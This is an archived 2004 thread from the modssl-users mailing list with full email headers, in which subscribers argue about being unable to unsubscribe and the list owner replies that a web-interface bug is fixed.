> > I want to be unsubscribed too.
> > Yes, this is a me too message. How would you think I should do, AS THE
> > COMMON UNSUBSCRIBING PROCEDURE DOES NOT WORK?
>
> And posting to the list doesn't help you with that, either.
> SO STOP WASTING BANDWIDTH! AND STOP SPAMMING!
> The next "me-too" post is reported to SpamCop!
>
> -Joe

So there is no help. Fine with me. Everything about this ML will be rejecte=
d=20
from my mail server.
=2D----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.2 (GNU/Linux)

iD8DBQFAawK94xdXbJVtuJMRAmz6AJ9k6Qr21D9I/44rCmUiFr7jpmXNUgCgmxXa
EvTbTb6gid8HBaMcWuDb49Y=3D
=3DuC/o
=2D----END PGP SIGNATURE-----


From bryn@bigtrouble.com  Wed Mar 31 19:48:04 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from smtp809.mail.sc5.yahoo.com (smtp809.mail.sc5.yahoo.com [66.163.168.188])
	by master.modssl.org (Postfix) with SMTP id 6FDEFA8939
	for ; Wed, 31 Mar 2004 19:47:45 +0200 (CEST)
Received: from unknown (HELO t20) (bryndyment@sbcglobal.net@64.172.62.133 with login)
  by smtp809.mail.sc5.yahoo.com with SMTP; 31 Mar 2004 17:47:34 -0000
From: "Bryn Dyment" 
To: 
Subject: A suggestion
Date: Wed, 31 Mar 2004 09:47:11 -0800
Message-ID: <000b01c41748$320837a0$6901a8c0@t20>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.4510
In-Reply-To: <200403311922.35778@prules>
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Importance: Normal

Let's assume that the list masters are now aware there's a serious problem
with the list.  I suggest we give them a couple of days to solve the
problem, then send a "things are fixed" e-mail to the list (or a status
update if things are still not fixed after a few days).

SSL is so complex.  Mailing lists are so easy.  I'm sure they'll be able to
straighten things out in a couple of days.


From efischer@rsasecurity.com  Wed Mar 31 19:49:30 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from vulcan.rsasecurity.com (vulcan.rsasecurity.com [204.167.114.130])
	by master.modssl.org (Postfix) with ESMTP id 7E941A8A51
	for ; Wed, 31 Mar 2004 19:49:14 +0200 (CEST)
Received: from ebola.securitydynamics.com by vulcan.rsasecurity.com
          via smtpd (for [195.27.176.156]) with ESMTP; Wed, 31 Mar 2004 12:49:10 -0500
Received: from sdtihq24.securid.com (localhost [127.0.0.1])
	by ebola.securitydynamics.com (8.12.10/NULL) with ESMTP id i2VHma3l002681;
	Wed, 31 Mar 2004 12:48:36 -0500 (EST)
Received: from exna00.securitydynamics.com (exna00.securitydynamics.com [10.100.8.217])
	by sdtihq24.securid.com (8.12.10/8.12.9) with ESMTP id i2VHn505019442;
	Wed, 31 Mar 2004 12:49:06 -0500 (EST)
Received: by exna00.securitydynamics.com with Internet Mail Service (5.5.2657.72)
	id <2A9WSHZ2>; Wed, 31 Mar 2004 12:49:05 -0500
Message-ID: 
From: "Fischer, Eric" 
To: "'Carlos Villegas'" 
Cc: "'modssl-users-l@master.modssl.org'" 
Subject: RE: unsubscribe modssl-users efischer@rsasecurity.com
Date: Wed, 31 Mar 2004 12:45:07 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2657.72)
Content-Type: text/plain

I have just wasted one second of my time and gone to the web page. 

http://www.modssl.org/support/

There is a web form that will submit an unsubscribe to this list. I suggest
people try this and if they still get list email then email Ralf S.
Engelschall at rse@engelschall.com who is listed on the site as the Primary
author of the modssl project.

Regards,

Eric


-----Original Message-----
From: Carlos Villegas [mailto:villegas@math.gatech.edu] 
Sent: Wednesday, March 31, 2004 12:38 PM
To: Ihor Bilyy
Cc: modssl-users-l@master.modssl.org
Subject: Re: unsubscribe modssl-users efischer@rsasecurity.com

On Wed, Mar 31, 2004 at 11:25:48AM -0500, Ihor Bilyy wrote:
> could you please to each other directly ?!!

NO!!!! He sent that to the list, which clearly indicated that he was
possibly having trouble to unsubscribe because of a mistake on the
destination email address and not by the list's fault.
Others could be making that mistake if the unsubscribe information is not
stated clearly in the webpage (I don't remember, and won't waste my time
checking it). So both messages (mine and his reply to it) were relevant to
other list members and list owners... Use a threaded mail reader :)

Carlos

From dparis@w3works.com  Wed Mar 31 19:50:09 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from boggle.pobox.com (boggle.pobox.com [208.58.1.193])
	by master.modssl.org (Postfix) with ESMTP id 7F73FA8939
	for ; Wed, 31 Mar 2004 19:50:01 +0200 (CEST)
Received: from colander (localhost [127.0.0.1])
	by boggle.pobox.com (Postfix) with ESMTP id 6E25B83576;
	Wed, 31 Mar 2004 12:49:55 -0500 (EST)
Received: from jester.pobox.com (jester.pobox.com [64.71.166.114])
	by boggle.pobox.com (Postfix) with ESMTP id 461DD834FB;
	Wed, 31 Mar 2004 12:49:13 -0500 (EST)
Received: from yourpa86z1i3g7 (unknown [65.73.239.18])
	by jester.pobox.com (Postfix) with ESMTP
	id 53EE484; Wed, 31 Mar 2004 12:48:54 -0500 (EST)
From: "Dave Paris" 
To: , 
Subject: RE: (not a mee too) [Fwd: Re: Shut the list down]
Date: Wed, 31 Mar 2004 12:49:03 -0500
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Importance: Normal
In-Reply-To: <406B01CD.5070207@ics.uci.edu>

I'll assume you've already submitted Ralf's address then? ;-)

All joking aside, I hate getting these "mee too" mails as much as the next
guy (if not more since I already deal with 1200+ mails a day), but I can
appreciate the frustration of these folks, if, in fact, majordomo has gone
on permanent vacation.  Joe .. respectfully, you may want to take a couple
steps back and take a slightly more objective approach on this.  Then again,
maybe not.  Do as you will.  (I certainly have been accused, and rightly so,
of being a little overzealous from time to time. ;-)

It'd be a shame if this list were to go away, but it seems to be collapsing
under its own weight, general disrepair, and lack of management.  Perhaps a
rebirth as either a moderated or otherwise better-controled list isn't such
a bad idea... not that I have the spare time to volunteer myself, mind you.
:-)

Kind Regards~
-d

> -----Original Message-----
> From: Joachim Feise [mailto:jfeise@ics.uci.edu]
> Sent: Wednesday, March 31, 2004 12:37 PM
> To: modssl-users-l@master.modssl.org
> Subject: Re: [Fwd: Re: Shut the list down]
[...]
> And posting to the list doesn't help you with that, either.
> SO STOP WASTING BANDWIDTH! AND STOP SPAMMING!
> The next "me-too" post is reported to SpamCop!
>
> -Joe
>
>



From dbasener@aurora.edu  Wed Mar 31 19:56:52 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from mail.aurora.edu (mail.aurora.edu [64.107.89.49])
	by master.modssl.org (Postfix) with ESMTP id D04E1A8948
	for ; Wed, 31 Mar 2004 19:56:35 +0200 (CEST)
Received: from aurora.edu (notos202.aurora.edu [172.16.20.202] (may be forged))
	by mail.aurora.edu (8.12.1/8.12.1) with ESMTP id i2VHuTmI246794;
	Wed, 31 Mar 2004 11:56:29 -0600 (CST)
Message-ID: <406B0647.6070707@aurora.edu>
Date: Wed, 31 Mar 2004 11:56:23 -0600
From: Dave Basener 
User-Agent: Mozilla Thunderbird 0.5 (X11/20040208)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: jfeise@ics.uci.edu
Cc: modssl-users-l@master.modssl.org
Subject: Re: [Fwd: Re: Shut the list down]
References: <1080750666.5529.2.camel@Fedora> <1080752337.6793.30.camel@localhost.localdomain> <406AFA6F.7010802@ics.uci.edu> <200403311922.35778@prules> <406B01CD.5070207@ics.uci.edu>
In-Reply-To: <406B01CD.5070207@ics.uci.edu>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit

Joachim Feise wrote:

>Tazio Ceri said  on 3/31/2004 9:22:
>
>  
>
>> I want to be unsubscribed too.
>>
>>>Yes, this is a me too message. How would you think I should do, AS THE COMMON 
>>>UNSUBSCRIBING PROCEDURE DOES NOT WORK?
>>>      
>>>
>
>And posting to the list doesn't help you with that, either.
>SO STOP WASTING BANDWIDTH! AND STOP SPAMMING!
>The next "me-too" post is reported to SpamCop!
>
>-Joe
>  
>

Let's see.  You've got a list that won't shut up when people ask it to, 
and you are calling the people who are complaining "spammers"?  You 
don't know the first thing about what spam is.  If anything, this list 
could appropriately be reported to spam cop. 

Oh, and by the way, I'm *not* asking to be unsubscribed.

Dave Basener

-- 
"... be the change you wish to see in the world."  - Gandhi

David Basener               http://www.aurora.edu/~dbasener
System Administrator                Dave.Basener@aurora.edu
Aurora University                              630 844 4889


From jfeise@ics.uci.edu  Wed Mar 31 20:12:16 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from pv105234.reshsg.uci.edu (pv105234.reshsg.uci.edu [128.195.105.234])
	by master.modssl.org (Postfix) with SMTP id 590D2A8939
	for ; Wed, 31 Mar 2004 20:11:57 +0200 (CEST)
Received: (qmail 7858 invoked from network); 31 Mar 2004 18:11:35 -0000
Received: from unknown (HELO ics.uci.edu) (192.168.1.189)
  by pv105234.reshsg.uci.edu with SMTP; 31 Mar 2004 18:11:35 -0000
Message-ID: <406B09CD.60500@ics.uci.edu>
Date: Wed, 31 Mar 2004 10:11:25 -0800
From: Joachim Feise 
Reply-To: jfeise@ics.uci.edu
Organization: University of California, Irvine
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7b) Gecko/20040316
X-Accept-Language: en, de
MIME-Version: 1.0
To: modssl-users-l@master.modssl.org
Subject: Re: [Fwd: Re: Shut the list down]
References: <1080750666.5529.2.camel@Fedora> <1080752337.6793.30.camel@localhost.localdomain> <406AFA6F.7010802@ics.uci.edu> <200403311922.35778@prules> <406B01CD.5070207@ics.uci.edu> <406B0647.6070707@aurora.edu>
In-Reply-To: <406B0647.6070707@aurora.edu>
X-Enigmail-Version: 0.83.5.0
X-Enigmail-Supports: pgp-inline, pgp-mime
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Dave Basener said  on 3/31/2004 9:56:

> Joachim Feise wrote:
> 
>> Tazio Ceri said  on 3/31/2004 9:22:
>>
>>  
>>
>>> I want to be unsubscribed too.
>>>
>>>> Yes, this is a me too message. How would you think I should do, AS
>>>> THE COMMON UNSUBSCRIBING PROCEDURE DOES NOT WORK?
>>>>     
>>
>>
>> And posting to the list doesn't help you with that, either.
>> SO STOP WASTING BANDWIDTH! AND STOP SPAMMING!
>> The next "me-too" post is reported to SpamCop!
>>
>> -Joe
>>  
>>
> 
> Let's see.  You've got a list that won't shut up when people ask it to,
> and you are calling the people who are complaining "spammers"?  You
> don't know the first thing about what spam is.  If anything, this list

Huh? I get >1000 spams a week. And this crap here just adds to it.
Learn how to use a mailing list properly.
Geez, I always thought people who can run a webserver with ssl should
be smart enough to not spam a list...
Once and for all: COMPLAIN TO THE ADMIN, NOT TO THE USERS OF A LIST!
What do you guys think the users can do about your problems? NOTHING!

Oh, and to Dave: please don't select "Reply to all." That results in
duplicate messages, one to the person you are replying to, and one to
the list. Another waste of bandwidth...

-Joe

From derrick@foundationcomputing.com  Wed Mar 31 20:23:41 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from foundationcomputing.net (foundationcomputing.net [207.160.174.55])
	by master.modssl.org (Postfix) with ESMTP id 5A733A8974
	for ; Wed, 31 Mar 2004 20:23:25 +0200 (CEST)
Received: from [207.160.174.20] ([207.160.174.20] verified)
  by foundationcomputing.net (CommuniGate Pro SMTP 4.1.8)
  with ESMTP id 4625398 for modssl-users-l@master.modssl.org; Wed, 31 Mar 2004 12:18:45 -0600
Mime-Version: 1.0 (Apple Message framework v613)
In-Reply-To: <406B0647.6070707@aurora.edu>
References: <1080750666.5529.2.camel@Fedora> <1080752337.6793.30.camel@localhost.localdomain> <406AFA6F.7010802@ics.uci.edu> <200403311922.35778@prules> <406B01CD.5070207@ics.uci.edu> <406B0647.6070707@aurora.edu>
Content-Type: text/plain; charset=US-ASCII; format=flowed
Message-Id: <7C439D34-8340-11D8-B672-000393C7877A@foundationcomputing.com>
Content-Transfer-Encoding: 7bit
From: Derrick Fogle 
Subject: Re: [Fwd: Re: Shut the list down]
Date: Wed, 31 Mar 2004 12:23:19 -0600
To: modssl-users-l@master.modssl.org
X-Mailer: Apple Mail (2.613)

I've been poking around a bit, and don't have any answers, but a little 
information for list users. Here's what happens to an email that is 
sent to the "modssl-users-l" or "modssl-users" list...

> Received: from domain.com (xxx)
> 	by master.modssl.org (Postfix) with ESMTP id D04E1A8948
> 	for ; Wed, 31 Mar 2004 19:56:35 
> +0200 (CEST)

The message gets to "master.modssl.org" - presumably the system that's 
running this list.

> Received: from master.modssl.org (unknown [195.27.176.156])
> 	by mmx.engelschall.com (Postfix) with ESMTP id 0D357193BC
> 	for ; Wed, 31 Mar 2004 19:56:49 
> +0200 (CEST)

But wait... the message is being passed on to "mmx.engelschall.com"...

> Received: from mmx.engelschall.com ([195.27.130.252] verified)
>   by foundationcomputing.net (CommuniGate Pro SMTP 4.1.8)
>   with ESMTP id 4625296 for derrick@foundationcomputing.com; Wed, 31 
> Mar 2004 11:52:31 -0600

...and finally, the message appears to be distributed to individual 
list recipients from the mmx.engelschall.com machine.

Now, I've sent Majordomo "which" queries to a number of domain 
addresses. Here's what I get:

mmx.engelshchall.com - "majordomo@" rejected - no such user account
engelschall.com - Majordomo is running, but doesn't seem to have my 
address
master.modssl.org - Majordomo is running, but doesn't seem to have my 
address
modssl.org - Majordomo is running, but doesn't seem to have my address

So it's obvious that the list is being handled by a machine 
(mmx.engelshchall.com) that doesn't appear to have majordomo running on 
it. All the machines that *do* have majordomo running on it, don't 
actually handle the list traffic. That would explain why no unsubscribe 
requests work.


All these domains are owned by the same person:

Registrant:
Engelschall, Ralf S. (ENGELSCHALL-DOM)
    Silnerstr. 28
    Dachau D-85221
    DE

    Domain Name: ENGELSCHALL.COM

    Administrative Contact, Technical Contact:
       Engelschall, Ralf S  (rse5)		rse@ENGELSCHALL.COM
       Silnerstr. 28
       Dachau Germany 85221
       DE
       +49-8131-56085 fax: 123 123 1234

I presume enough people, by now, have tried to contact Ralf. The only 
thing to do at this point is to stop bickering on the list, and wait 
for something to happen. If you don't want mail from the list, filter 
it and shitcan it.

-Derrick


From jfeise@ics.uci.edu  Wed Mar 31 20:30:18 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from pv105234.reshsg.uci.edu (pv105234.reshsg.uci.edu [128.195.105.234])
	by master.modssl.org (Postfix) with SMTP id 77530A8A4D
	for ; Wed, 31 Mar 2004 20:30:01 +0200 (CEST)
Received: (qmail 8240 invoked from network); 31 Mar 2004 18:29:41 -0000
Received: from unknown (HELO ics.uci.edu) (192.168.1.189)
  by pv105234.reshsg.uci.edu with SMTP; 31 Mar 2004 18:29:41 -0000
Message-ID: <406B0E0A.6050204@ics.uci.edu>
Date: Wed, 31 Mar 2004 10:29:30 -0800
From: Joachim Feise 
Reply-To: jfeise@ics.uci.edu
Organization: University of California, Irvine
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7b) Gecko/20040316
X-Accept-Language: en, de
MIME-Version: 1.0
To: modssl-users-l@master.modssl.org
Subject: Re: (not a mee too) [Fwd: Re: Shut the list down]
References: 
In-Reply-To: 
X-Enigmail-Version: 0.83.5.0
X-Enigmail-Supports: pgp-inline, pgp-mime
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Dave Paris said  on 3/31/2004 9:49:

> I'll assume you've already submitted Ralf's address then? ;-)
> 
> All joking aside, I hate getting these "mee too" mails as much as the next
> guy (if not more since I already deal with 1200+ mails a day),

And these content-free "me-too" posts add to that load...

> but I can
> appreciate the frustration of these folks, if, in fact, majordomo has gone
> on permanent vacation.

Well, while there may be frustration, it doesn't help to flood the list
with it...
People who use mod_ssl are (hopefully) smart, so they should have known
that.

>  Joe .. respectfully, you may want to take a couple
> steps back and take a slightly more objective approach on this.

The objective approach is that I am subscribed to mod_ssl for the purpose
of learning about mod_ssl, NOT for the purpose of learning about whatever
problems there are with the majordomo setup.

-Joe

From wwalker@bybent.com  Wed Mar 31 20:40:00 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from buzzard.onr.com (buzzard.kdi.com [207.200.55.226])
	by master.modssl.org (Postfix) with ESMTP id 3CDFDA898B
	for ; Wed, 31 Mar 2004 20:39:42 +0200 (CEST)
Received: from localhost.localdomain (adsl-66-136-209-197.dsl.austtx.swbell.net [66.136.209.197])
	by buzzard.onr.com (8.12.8/8.12.8) with ESMTP id i2VIjW7n023401
	(version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NO);
	Wed, 31 Mar 2004 12:45:32 -0600
Received: from localhost.localdomain (localhost.localdomain [127.0.0.1])
	by localhost.localdomain (8.12.11/8.12.10) with ESMTP id i2VIdaeo002869;
	Wed, 31 Mar 2004 12:39:36 -0600
Received: (from wwalker@localhost)
	by localhost.localdomain (8.12.11/8.12.11/Submit) id i2VIdZMK002868;
	Wed, 31 Mar 2004 12:39:35 -0600
Date: Wed, 31 Mar 2004 12:39:35 -0600
From: Wayne Walker 
To: modssl-users-l@master.modssl.org
Subject: Re: Shut the list down
Message-ID: <20040331183934.GA2858@bybent.com>
Reply-To: Wayne Walker 
References: 
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.4.1i

Please manually unsubscribe me (it's VERY easy to switch to mailman,
then all your troubles go away... :)

On Wed, Mar 31, 2004 at 09:42:08AM -0600, Jeff Hallgren wrote:
> I've tried for weeks now to get off the modssl-users email list.
> The web site pages at www.modssl.org for subscribe/unsubscribe do not 
> work.
> The majordomo interface, while it is responsive, is apparently 
> non-functional.
> 
> I would ask that the managers/owner of the modssl-users list (or 
> modssl-users-l?) take some responsibility for the problems -( spam, 
> inability to get removed from list).
> Shut all the lists down, re-name them and ask interested folks to 
> re-subscribe.
> 
> Come on guys, fix this!
> Jeff

-- 

Wayne Walker
wwalker@bybent.com                 Do you use Linux?!
http://www.bybent.com              Get Counted!  http://counter.li.org/
Perl - http://www.perl.org/        Perl User Groups - http://www.pm.org/
Jabber IM:  wwalker@jabber.phototropia.org       AIM:     lwwalkerbybent

From skip@mojam.com  Wed Mar 31 20:53:55 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from manatee.mojam.com (manatee.mojam.com [199.249.165.175])
	by master.modssl.org (Postfix) with ESMTP id 6E303A8939
	for ; Wed, 31 Mar 2004 20:53:53 +0200 (CEST)
Received: from montanaro.dyndns.org (c-24-12-188-128.client.comcast.net [24.12.188.128])
	by manatee.mojam.com (8.12.1-20030917/8.12.1) with ESMTP id i2VIrQeU025560;
	Wed, 31 Mar 2004 12:53:27 -0600
Received: from montanaro.dyndns.org (localhost [127.0.0.1])
	by montanaro.dyndns.org (8.12.9/8.12.6) with ESMTP id i2VIrJxG015909;
	Wed, 31 Mar 2004 12:53:19 -0600 (CST)
Received: by montanaro.dyndns.org (8.12.9/8.12.2/Submit) id i2VIrEYn015906;
	Wed, 31 Mar 2004 12:53:14 -0600 (CST)
From: Skip Montanaro 
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <16491.5018.206915.114658@montanaro.dyndns.org>
Date: Wed, 31 Mar 2004 12:53:14 -0600
To: jfeise@ics.uci.edu
Cc: modssl-users-l@master.modssl.org, rse@engelschall.com,
	owner-mmx-modssl-users@mmx.engelschall.com
Subject: Re: [Fwd: Re: Shut the list down]
In-Reply-To: <406B09CD.60500@ics.uci.edu>
References: <1080750666.5529.2.camel@Fedora>
        <1080752337.6793.30.camel@localhost.localdomain>
        <406AFA6F.7010802@ics.uci.edu>
        <200403311922.35778@prules>
        <406B01CD.5070207@ics.uci.edu>
        <406B0647.6070707@aurora.edu>
        <406B09CD.60500@ics.uci.edu>
X-Mailer: VM 7.17 under 21.5  (beta16) "celeriac" (+CVS-20040209) XEmacs Lucid
Reply-To: skip@pobox.com


With his knickers in a twist, Joe wrote:

    > Learn how to use a mailing list properly.

It has nothing to do with learning how to use a mailing list properly and
everything to do with a broken list and an unresponsive list admin.  Over
the past couple weeks I went through the following steps:

    1. I sent an "unsubscribe" message to majordomo@modssl.org.  It
       responded as expected that I'd been unsubscribed.  However, list mail
       kept coming.

    2. A few days later I tried the above "unsubscribe" again.  This time it
       responded that I wasn't a member of that mailing list.  List mail
       kept coming.

    3. I tried sending a message to owner-modssl-users@modssl.org asking for
       help getting unsubscribed.  That message bounced.  List mail kept
       coming.

    4. Looking at the From_ line of the message I am now responding to, I
       saw owner-mmx-modssl-users@mmx.engelschall.com listed as the address.
       Taking a wild-ass guess I tried sending unsubscribe messages to
       majordomo@mmx.engelschall.com asking to be unsubscribed from
       modssl-users and mmx-modssl-users.  Both messages bounced because
       majordomo isn't a valid email alias on mmx.engelschall.com.  List
       mail keeps coming.

I'm not sure what more I can do (I've cc'd a couple other email addresses in
hopes of reaching the list owner).  After Step 3 failed I sent a message to
the list asking for help.  I can see that's not done much other than stir up
a hornets' nest.  It seems most of the other people who have been
incompletely unsubscribed have at least tried the normal mechanisms.  I
doubt anyone tried sending the list an unsubscribe request as the first
step, only as the last resort.

    Joe> Once and for all: COMPLAIN TO THE ADMIN, NOT TO THE USERS OF A
    Joe> LIST!  What do you guys think the users can do about your problems?
    Joe> NOTHING!

You personally, perhaps not, but when all other avenues have failed, there
is no other recourse.  Perhaps a buddy of the admin will see it, or the guy
who covers the list when the admin is on vacation will see it, or ...  I
would clearly love nothing better than to hook up with the real admin (Ralf
E., I presume), but that seems not to be happening, via normal channels or
back doors.

Contact info for engelschall.com shows Ralf as the admin and tech contact:

      Engelschall, Ralf S  (rse5)               rse@ENGELSCHALL.COM
      Silnerstr. 28
      Dachau Germany 85221
      DE
      +49-8131-56085 fax: 123 123 1234

Perhaps there's someone in Germany or other nearby country who can try the
phone number and see why Ralf isn't responding.

-- 
Skip Montanaro
Got gigs? http://www.musi-cal.com/submit.html
Got spam? http://www.spambayes.org/
skip@pobox.com

From owner-modssl-users@modssl.org  Wed Mar 31 21:34:21 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 01C3CA8974; Wed, 31 Mar 2004 21:34:20 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from visp.engelschall.com (visp.engelschall.com [195.27.176.148])
	by master.modssl.org (Postfix) with ESMTP id 8D2F7A8939
	for ; Wed, 31 Mar 2004 21:34:20 +0200 (CEST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 7D5B74CE5CF; Wed, 31 Mar 2004 21:34:20 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id B5ACC28613; Wed, 31 Mar 2004 21:32:55 +0200 (CEST)
Date: Wed, 31 Mar 2004 21:32:55 +0200
From: "Ralf S. Engelschall" 
To: modssl-users@modssl.org
Subject: Re: A suggestion
Message-ID: <20040331193255.GA57722@engelschall.com>
References: <200403311922.35778@prules> <000b01c41748$320837a0$6901a8c0@t20>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <000b01c41748$320837a0$6901a8c0@t20>
User-Agent: Mutt/1.4.2.1i
Organization: Engelschall, Germany.
X-Web-Homepage: http://www.engelschall.com/
X-PGP-Public-Key: http://www.engelschall.com/ho/rse/pgprse.asc
X-PGP-Fingerprint: 00 C9 21 8E D1 AB 70 37 DD 67 A2 3A 0A 6F 8D A5
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Ralf S. Engelschall" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Wed, Mar 31, 2004, Bryn Dyment wrote:

> Let's assume that the list masters are now aware there's a serious problem
> with the list.  I suggest we give them a couple of days to solve the
> problem, then send a "things are fixed" e-mail to the list (or a status
> update if things are still not fixed after a few days).
> [...]

The web interface had a bug. I've fixed it and it should now work again.
The email interface to Majordomo is not broken AFAIK. There are plenty
of people successfully subscribing and unsubscribing from the list. The
reason why people will have problems to unsubscribe is because they
subscribed under a different email address than the one under which
they try to unsubscribe. For instance I search for four people on the
previous thread which wanted to unsubscribe and only one I was able to
find (I tried all forms of substrings of their name, email address,
etc).

The others definetely have subscribed under totally different addresses
and until they tell Majordomo or me what address this was, there is no
chance to unsubscribe them, of course. But please stop complaining on
the list. Contact me personally and tell me all your email addresses
you used in the past and I will try to remove all of them from the list
manually.

                                       Ralf S. Engelschall
                                       rse@engelschall.com
                                       www.engelschall.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From jfeise@ics.uci.edu  Wed Mar 31 21:47:49 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from pv105234.reshsg.uci.edu (pv105234.reshsg.uci.edu [128.195.105.234])
	by master.modssl.org (Postfix) with SMTP id 37D7CA8939
	for ; Wed, 31 Mar 2004 21:47:33 +0200 (CEST)
Received: (qmail 9758 invoked from network); 31 Mar 2004 19:47:12 -0000
Received: from unknown (HELO ics.uci.edu) (192.168.1.189)
  by pv105234.reshsg.uci.edu with SMTP; 31 Mar 2004 19:47:12 -0000
Message-ID: <406B2035.1020509@ics.uci.edu>
Date: Wed, 31 Mar 2004 11:47:01 -0800
From: Joachim Feise 
Reply-To: jfeise@ics.uci.edu
Organization: University of California, Irvine
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.7b) Gecko/20040316
X-Accept-Language: en, de
MIME-Version: 1.0
To: modssl-users-l@master.modssl.org
Subject: Re: [Fwd: Re: Shut the list down]
References: <1080750666.5529.2.camel@Fedora>        <1080752337.6793.30.camel@localhost.localdomain>        <406AFA6F.7010802@ics.uci.edu>        <200403311922.35778@prules>        <406B01CD.5070207@ics.uci.edu>        <406B0647.6070707@aurora.edu>        <406B09CD.60500@ics.uci.edu> <16491.5018.206915.114658@montanaro.dyndns.org>
In-Reply-To: <16491.5018.206915.114658@montanaro.dyndns.org>
X-Enigmail-Version: 0.83.5.0
X-Enigmail-Supports: pgp-inline, pgp-mime
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Skip Montanaro said  on 3/31/2004 10:53:

> With his knickers in a twist, Joe wrote:
> 
>     > Learn how to use a mailing list properly.
> 
> It has nothing to do with learning how to use a mailing list properly and
> everything to do with a broken list and an unresponsive list admin.

And can you tell me why your problems with an unresponsive gives you
the right to spam the list with your petty problems?
You can always just /dev/null the mails.

-Joe

From crosser@rol.ru  Thu Apr  1 09:32:04 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from smtp.rol.ru (smtp.rol.ru [194.67.21.9])
	by master.modssl.org (Postfix) with ESMTP id 9A90FA8940
	for ; Thu,  1 Apr 2004 09:31:45 +0200 (CEST)
Received: from ariel.sovam.com ([194.67.3.216]:23943 "EHLO ariel.sovam.com"
	smtp-auth: "egc@online.ru" TLS-CIPHER: "DHE-RSA-AES256-SHA keybits
	256/256 version TLSv1/SSLv3" TLS-PEER-CN1: )
	by gnome07.net.rol.ru with ESMTP id S9913970AbUDAHbi (ORCPT
	);
	Thu, 1 Apr 2004 11:31:38 +0400
Subject: Re: Shut the list down
From: Eugene Crosser 
To: modssl-users-l@master.modssl.org
In-Reply-To: <200403311803.42241@prules>
References: <9B66BBD37D5DD411B8CE00508B69700F05ADDEC6@pborolocal.rnib.org.uk>
	 <200403311803.42241@prules>
Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-0trsHaKpfkqabt0jkxFk"
Organization: Sovintel
Message-Id: <1080804698.2284.6.camel@ariel.sovam.com>
Mime-Version: 1.0
X-Mailer: Ximian Evolution 1.4.5 
Date:	Thu, 01 Apr 2004 11:31:38 +0400


--=-0trsHaKpfkqabt0jkxFk
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

On Wed, 2004-03-31 at 20:03, Tazio Ceri wrote:

> I have been successuful in unsubscribing. It told me that I was successfu=
lly=20
> unsubscribed, but I am receiving message from your list.
> I cannot unsubscribe any more because it thinks I am already unsubscribed=
.

Same here: Majordomo says that my address is not on the list but I
continue to receive messages.

Listmaster please help.  I must have been subscribed as


Thanks and sorry for noise.

Eugene

--=-0trsHaKpfkqabt0jkxFk
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (GNU/Linux)

iD8DBQBAa8VZtQFsU5rTNjcRAsERAKCiOhh+ET0FGfdle0iogSn/L4BYBACgqiT2
